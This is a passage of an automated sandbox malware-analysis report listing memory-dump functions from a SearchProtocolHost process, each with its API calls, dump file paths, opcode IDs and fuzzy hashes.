                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB4F60 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02DB4F94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: c779744041bb04ee28eeb504ce302c9315f428dc0334e15b79c7bac853b9737f
                                                                                      • Instruction ID: b10ae9ce60f22beebedac40af9c546ad3a7ce94fcf46d5d9182d24f9913a636e
                                                                                      • Opcode Fuzzy Hash: c779744041bb04ee28eeb504ce302c9315f428dc0334e15b79c7bac853b9737f
                                                                                      • Instruction Fuzzy Hash: 36E086362406087BD611EA59DC01FDB77ADDFC5B10F404015FA4C67281CA71B9018BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b11455e2c23509336f179a26384546f8c4885e16187ac156a08b14326d7853fc
                                                                                      • Instruction ID: c17207604b1f8c330efcb1712cde1f277d95d1f797a472c363d7fc165bcbf7e7
                                                                                      • Opcode Fuzzy Hash: b11455e2c23509336f179a26384546f8c4885e16187ac156a08b14326d7853fc
                                                                                      • Instruction Fuzzy Hash: 6F90023161540422E540B2584984546400597E4701B51C525E4414554CCB2489567362
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 75e10a39a5019e25534cc4cba9dff139be6bcb549d0fae6b1b27ca44ed135310
                                                                                      • Instruction ID: fc698c6cd2efc4dcfa64a4faae2153906bb274a2e8651af8f8245b4ef5f90f3d
                                                                                      • Opcode Fuzzy Hash: 75e10a39a5019e25534cc4cba9dff139be6bcb549d0fae6b1b27ca44ed135310
                                                                                      • Instruction Fuzzy Hash: 55900261611104529540B2584904406600597E5701391C629A4544560CC7288855B26A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0c01ae893d4d096f425289620d443b7ad715fbcbc03c341d9ec8be5ed29014e9
                                                                                      • Instruction ID: add9bcd7942a2290f9aea132c0b60989a8a77c7da122a2b6057e0f4945df3c5a
                                                                                      • Opcode Fuzzy Hash: 0c01ae893d4d096f425289620d443b7ad715fbcbc03c341d9ec8be5ed29014e9
                                                                                      • Instruction Fuzzy Hash: F690023161510812E500A2584614706100587D4601F61C925A4414568DC7A5895175A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c30cd5fe3a9fd27856cfa3b7ec3f8d6aeb6d9b73f47139202006ce5f41c11b00
                                                                                      • Instruction ID: 7b3710f3ccfabdeab605289b51bbc1ba6ca196b53d16f74c6d62c833d87f287f
                                                                                      • Opcode Fuzzy Hash: c30cd5fe3a9fd27856cfa3b7ec3f8d6aeb6d9b73f47139202006ce5f41c11b00
                                                                                      • Instruction Fuzzy Hash: 3990023121100C12E580B258450464A000587D5701F91C529A4015654DCB258A5977A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: da5672ed3e2acedb5658448ad9afa74b8c291f7df66a800a9c60ae14b3c92deb
                                                                                      • Instruction ID: 85d001d2d1cc7aac80766ae0c26af49999cc1fa35d9c1f97e4fcc78cf67f6b75
                                                                                      • Opcode Fuzzy Hash: da5672ed3e2acedb5658448ad9afa74b8c291f7df66a800a9c60ae14b3c92deb
                                                                                      • Instruction Fuzzy Hash: 0890023121504C52E540B2584504A46001587D4705F51C525A4054694DD7358D55B662
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b87dc4792086d1a011be13b27c2992ffa101693689481fa0dcd33697b9f59df6
                                                                                      • Instruction ID: bd2285a184268f37f2b997b79aade63bc7179b1e877d4a3a7fa76f15e943bb1e
                                                                                      • Opcode Fuzzy Hash: b87dc4792086d1a011be13b27c2992ffa101693689481fa0dcd33697b9f59df6
                                                                                      • Instruction Fuzzy Hash: 4D90023121100812E500A6985508646000587E4701F51D525A9014555EC77588917132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 67ad43825e178d74d6e02c356fa18835621ba4c756555b5f213bd28b5d377db9
                                                                                      • Instruction ID: 78008b89da53977bb7439ff878dae7e0fc3434411e8e804f77c4d09ccab57e9d
                                                                                      • Opcode Fuzzy Hash: 67ad43825e178d74d6e02c356fa18835621ba4c756555b5f213bd28b5d377db9
                                                                                      • Instruction Fuzzy Hash: 8890023121108C12E510A258850474A000587D4701F55C925A8414658DC7A588917122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 98af2a280aa55018437850f96076a40f33b9cc3e98c0e6507f59a525b63bdbd0
                                                                                      • Instruction ID: a7206be6eacc6cda3fdc583fa66de420e8dae970f3f00006a7d99b4a03dff13e
                                                                                      • Opcode Fuzzy Hash: 98af2a280aa55018437850f96076a40f33b9cc3e98c0e6507f59a525b63bdbd0
                                                                                      • Instruction Fuzzy Hash: 9A90023121100C52E500A2584504B46000587E4701F51C52AA4114654DC725C8517522
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6e4bc14f9d4ea45e5104e02fd7c4b4286cf9c55072904d5eda80fcbf7ae43a00
                                                                                      • Instruction ID: 4de4980ce8c5b1933b2488b5ce3785b411379eb944609e28587a0536db040bd3
                                                                                      • Opcode Fuzzy Hash: 6e4bc14f9d4ea45e5104e02fd7c4b4286cf9c55072904d5eda80fcbf7ae43a00
                                                                                      • Instruction Fuzzy Hash: CC900225231004125545E658070450B044597DA751391C529F5406590CC73188657322
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1e24ee1b8e4b0838f577831f80e6f8234a72b8ae707876842b1b64ed5f17a6e5
                                                                                      • Instruction ID: 79dd7b2aa7c363fd8157c58f1cabdbed04602a52fa8dc0bb0ab7d0ec78a2ed50
                                                                                      • Opcode Fuzzy Hash: 1e24ee1b8e4b0838f577831f80e6f8234a72b8ae707876842b1b64ed5f17a6e5
                                                                                      • Instruction Fuzzy Hash: 7290023161500C12E550B2584514746000587D4701F51C525A4014654DC7658A5576A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f90b9c74ad91a3437743d147ea15f26df152a999acba879c8a87fdc1c76a7461
                                                                                      • Instruction ID: 3a4c80bc2f8c882f7c02d8f79de3eff806b84da53262bd17515fd69b398c5fba
                                                                                      • Opcode Fuzzy Hash: f90b9c74ad91a3437743d147ea15f26df152a999acba879c8a87fdc1c76a7461
                                                                                      • Instruction Fuzzy Hash: CD900261212004139505B2584514616400A87E4601B51C535E5004590DC63588917126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b855398b88cbff5674e3b788afc1fc4a38dd7f7a500f7b5cdbda66fdfa264c59
                                                                                      • Instruction ID: 44c9cc92a074ff1c0a8f12f7bfb0a0bc18ca0cc139cece2f542b5d9f17324ea9
                                                                                      • Opcode Fuzzy Hash: b855398b88cbff5674e3b788afc1fc4a38dd7f7a500f7b5cdbda66fdfa264c59
                                                                                      • Instruction Fuzzy Hash: C5900435331004135505F75C07045070047C7DD751351C535F5005550CD731CC717133
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 602e45325221865e1cc0ba40252343f19d16c67d5cb53a6226f07738df6cd780
                                                                                      • Instruction ID: 63a69425d1d10477af3eba11ee162a8df0282a60c837d10ca009846787472ab6
                                                                                      • Opcode Fuzzy Hash: 602e45325221865e1cc0ba40252343f19d16c67d5cb53a6226f07738df6cd780
                                                                                      • Instruction Fuzzy Hash: 9D90022125505512E550B25C45046164005A7E4601F51C535A4804594DC66588557222
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 286ef452b234986955f5d3406d006fa12deb3c912515b9fc5b1b1431573649d4
                                                                                      • Instruction ID: e636ea312d8068f2a8f1e1dc7c1df9b96b4bc14bfacba388f80c3ba2602a9696
                                                                                      • Opcode Fuzzy Hash: 286ef452b234986955f5d3406d006fa12deb3c912515b9fc5b1b1431573649d4
                                                                                      • Instruction Fuzzy Hash: 7690022122180452E600A6684D14B07000587D4703F51C629A4144554CCA2588617522
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: fe8139a38e20d84c5782e3e375f4c97f42b7e1470c46c9973df60efb8b79dd6c
                                                                                      • Instruction ID: 90b3400cb2d7a177c607e8860fa862471c6dfb134f3e616f6d1ecfeb5047a0e0
                                                                                      • Opcode Fuzzy Hash: fe8139a38e20d84c5782e3e375f4c97f42b7e1470c46c9973df60efb8b79dd6c
                                                                                      • Instruction Fuzzy Hash: 6790026135100852E500A2584514B060005C7E5701F51C529E5054554DC729CC527127
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 18d6c1e06640155f0243671725ca0f58c91afacd9182146bc27b9feb1f60d57e
                                                                                      • Instruction ID: 52db39dff23453c3c249fea8523dce9be126b227b13e2c40b0e07ab22f1648d7
                                                                                      • Opcode Fuzzy Hash: 18d6c1e06640155f0243671725ca0f58c91afacd9182146bc27b9feb1f60d57e
                                                                                      • Instruction Fuzzy Hash: 2B90026121140813E540A6584904607000587D4702F51C525A6054555ECB398C517136
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 047d80b45d232172affb9111149a8380bb86b1bc3bb251d86e9ac05f733686a2
                                                                                      • Instruction ID: 4172d621ae03f56cc5b4bf80bd5b75ecfac35fa5f6ce2d6cc59f5b7f2bc50a35
                                                                                      • Opcode Fuzzy Hash: 047d80b45d232172affb9111149a8380bb86b1bc3bb251d86e9ac05f733686a2
                                                                                      • Instruction Fuzzy Hash: A7900221611004529540B26889449064005ABE5611751C635A4988550DC66988657666
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 14fdf872d86692bc50817f2e27fe5f1e8e840da7a7badc7d68111f430cf86c6a
                                                                                      • Instruction ID: 7e284e5ff31fb92d7808ec194249dd409642ea4bce6b02f43bd9f9d8b8cab960
                                                                                      • Opcode Fuzzy Hash: 14fdf872d86692bc50817f2e27fe5f1e8e840da7a7badc7d68111f430cf86c6a
                                                                                      • Instruction Fuzzy Hash: 6D90023121100823E511A2584604707000987D4641F91C926A4414558DD7668952B122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 27bf6d22556e42d02174d3492acc99aa219a9ae38fbe755a1331dbcd20cd4e91
                                                                                      • Instruction ID: 15a3bb827295c6a6429c828059eb169b24c642246b157e75402e4d456f580418
                                                                                      • Opcode Fuzzy Hash: 27bf6d22556e42d02174d3492acc99aa219a9ae38fbe755a1331dbcd20cd4e91
                                                                                      • Instruction Fuzzy Hash: EA90022161100912E501B2584504616000A87D4641F91C536A5014555ECB358992B132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 06d9e5de061d29c88437836390e4174ca002be4799c19861627f34ad1f987ea0
                                                                                      • Instruction ID: d23ee67153372c59cff63d3358fed8c54ff8b06834d4de206dc86d39602537b9
                                                                                      • Opcode Fuzzy Hash: 06d9e5de061d29c88437836390e4174ca002be4799c19861627f34ad1f987ea0
                                                                                      • Instruction Fuzzy Hash: A490022131100413E540B25855186064005D7E5701F51D525E4404554CDA2588567223
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 9f00075528cdc9855598e642376a7005f9bd4a96241e47c7fec58bbc781b7d8c
                                                                                      • Instruction ID: 210bdffc03f997ce0ffb4259be6adfb2238331c1b44ff608f3d82b123b661032
                                                                                      • Opcode Fuzzy Hash: 9f00075528cdc9855598e642376a7005f9bd4a96241e47c7fec58bbc781b7d8c
                                                                                      • Instruction Fuzzy Hash: 0590022922300412E580B258550860A000587D5602F91D929A4005558CCA2588697322
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
